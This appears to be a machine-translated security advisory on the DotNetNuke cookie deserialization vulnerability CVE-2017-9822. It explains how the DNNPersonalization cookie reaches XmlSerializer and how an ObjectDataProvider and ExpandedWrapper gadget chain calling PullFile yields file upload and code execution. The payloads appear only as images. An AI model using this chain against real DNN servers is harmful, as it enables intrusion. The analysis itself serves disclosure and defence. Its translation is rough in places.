DotNetNuke arbitrary code execution vulnerability(CVE-2017-9822)


### 0x00 background description DNN uses web cookies to identify users. A malicioususer can decode one of such cookies and identify who that user is, and possiblyimpersonate other users and even upload malicious code to the server. \--DNNsecurity-center 2017 7 November 5, DNN security sector released a number CVE-2017-9822 serious vulnerability, then the vulnerability report by Alvaro Muñoz (@pwntester)and OleksandrMirosh in BlackHat USA 2017 disclose some of the details. 360CERT follow-up analysis of the vulnerability and its in the. net use the XmlSerializer for serialization/deserialization of the attack the use of scenarios, identified as a serious vulnerability. ### 0x01 vulnerability overview DNNPersonalization is a DNN is used to store the logged in user of the personal data of the Cookie, the Cookie can be attacker to modify in order to achieve the server arbitrary file upload, remote code execution and other attacks. ### 0x02 vulnerability overview * Affect * Vulnerability rating: Critical * Allegedly, the world has more than 75 million users in using DNN to build their website, the scope of impact is large. * Impact version From 5. 0. 0 to 9. 1. 0 all version * Fix version DNN Platform 9.1.1 and EVOQ 9.1.1 ### 0x03 vulnerability details DNNPersonalization is a DNN is used to store the logged in user of the personal data of the Cookie, the Cookie can be attacker to modify in order to achieve the server arbitrary file upload, remote code execution and other attacks. #### 1\. Vulnerability code PersonalizationController. cs66-72 line: ![](https://images.seebug.org/1501726617185) From Cookie get to DNNPersonalization value and then passed to the Globals in the DeserializeHashTableXml method. Globals. cs 3687-3690 line: ![](https://images.seebug.org/1501726660263) Then follow up XmlUtils of DeSerializeHashtable method. XmlUtils. cs 184-218 line: ![](https://images.seebug.org/1501726692526) This method will use the item in the element type property value to set type, and in 208 rows where the element content is deserialized, here is the vulnerability of the trigger point. Vulnerability in the code from the touch input point to the final can take advantage of this process is quite intuitive, the next is for like this using the XmlSerializer to deserialize the vulnerability point for an attack using the analysis. ### 0x04 attacks the use of analysis #### 1\. The XmlSerializer the use of ![](https://images.seebug.org/1501726735223) When a class is serialized or deserialized when they are required to pass the class type information. To see the generated sequence of data in the form of: ![](https://images.seebug.org/1501726755580) Is an XML document, the class name and member variables are the elements to represent. #### 2\. The use of chain structure Modify the top of the TestClass class, which member variables of the test package. ![](https://images.seebug.org/1501726792120) This time and then to observe the code in the deserialization of the output, you can clearly know the setter is called automatically, so the setter can be as the use of the chain of the first step. The next step is to go find some can be used as an attack class. System. Windows. Data. ObjectDataProvider can call any of the run-time of the referenced class of any method. An example: ![](https://images.seebug.org/1501726849830) Quite in tune with the TestClass. FuncExample(“JustATest!”) , The ObjectDataProvider in the member variables are encapsulated, and each time you call the setter after the detection parameters are sufficient, enough the words will automatically go to the call incoming of the method. Wherein the process of borrowing BlackHat topics in a map to show. ![](https://images.seebug.org/1501726870467) Thus if serialization is an ObjectDataProvider class, then in the reverse sequence you can do any method calls to effect. Then find a the presence of can achieve the desired use of the effect of the method of the class on the line, such as DNN in there that one can do arbitrary file upload effect class, DotNetNuke. Common. Utilities. FileSystemUtils in the PullFile method: ![](https://images.seebug.org/1501726893082) #### 3\. Payload generation To generate the payload there is a little problem need to solve, is the ObjectDataProvider that contains a System. Object member variables objectInstance, of the time of execution of the XmlSerializer don't know this variable is of specific type, resulting in no serialization. But this problem can be through the use of ExpandedWrapper the extended attribute type to solve. ![](https://images.seebug.org/1501726915616) Generated content as follows: ![](https://images.seebug.org/1501726955498) DNN is by acquiring the item of property the value type, then call Type. The GetType to get the serialization of the data type and then performs deserialization. So need to add the corresponding Assembly name, you can use the following code to get the type of the value: ![](https://images.seebug.org/1501726993083) ![](https://images.seebug.org/1501727002827) Conjunction with the DNN code to generate the final Payload: ![](https://images.seebug.org/1501727022918) ### 0x05 exploit verification The vulnerability is triggered to the point where the DeSerializeHashtable function on a local to do an exploit validation. ![](https://images.seebug.org/1501727055112) Then look at the server side, you can see the exploit is successful. ![](https://images.seebug.org/1501727076976)